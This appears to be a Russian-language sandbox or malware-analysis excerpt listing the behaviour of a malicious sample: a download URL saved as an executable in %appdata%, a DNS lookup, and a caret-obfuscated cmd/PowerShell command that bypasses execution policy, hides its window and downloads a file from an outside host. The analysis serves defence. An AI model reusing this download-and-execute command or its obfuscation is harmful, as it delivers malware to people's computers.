Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWer^ShE^Ll^.EX^E ^-^E^X^EcUt^IONpOLICy ByPAss^ ^-N^O^prO^Fil^E ^-Win^DOws^t^Y^L^e ^HIDde^n (NEw-^obje^ct sy^stem.^N^ET^.WEbclieN^T).^D^oW^NL^o^Ad^fi^L^e('http://www.fapoerg...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "poWer^ShE^Ll^.EX^E ^-^E^X^EcUt^IONpOLICy ByPAss^ ^-N^O^prO^Fil^E ^-Win^DOws^t^Y^L^e ^HIDde^n (NEw-^obje^ct sy^stem.^N^ET^.WEbclieN^T).^D^oW^NL^o^Ad^fi^L^e('http://www.fapoerg...' (со скрытым окном)